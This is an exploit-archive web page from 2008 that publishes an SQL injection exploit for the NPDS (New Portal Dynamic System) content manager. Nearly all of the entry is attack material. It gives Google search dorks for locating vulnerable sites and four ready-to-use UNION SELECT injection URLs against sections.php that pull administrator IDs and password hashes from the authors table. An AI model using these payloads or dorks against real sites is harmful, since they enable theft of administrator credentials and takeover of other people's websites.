|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home ExploitAlert Database |
|
|
Topic : | (NPDS)New Portal Dynamic System SQL Injection Vulnerability
|
ExploitAlert : 3609
Credit : S@BUN
Date : 26.03.2008
Download
Plain text version
 Exploit Code : ##########################################
#
# (NPDS)New Portal Dynamic System SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "sections.php?op=listarticles"secid
#
# DORK 2 ; allinurl: "sections php op"
#
###########################################
EXPLOiT :
sections.php?op=listarticles&secid=-9999999/**/union/**/select/**/concat(ai
d,0x3a,pwd)/**/from/**/authors/*
****************************
sections.php
?op=listarticles&secid=-9999999/**/union/**/select/**/concat(aid,0x3a,pwd),
1,2,concat(aid,0x3a,pwd)/**/from/**/authors/*
****************************
sections.php
?op=listarticles&secid=-9999999/**/union/**/select/**/0,concat(aid,0x3a,pwd
),2/**/from/**/authors/*
***************************
sections.php
?op=printpage&artid=-9999999/**/union/**/select/**/0,concat(aid,0x3a,pwd)/*
*/from/**/authors/*
###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
|
|
|
|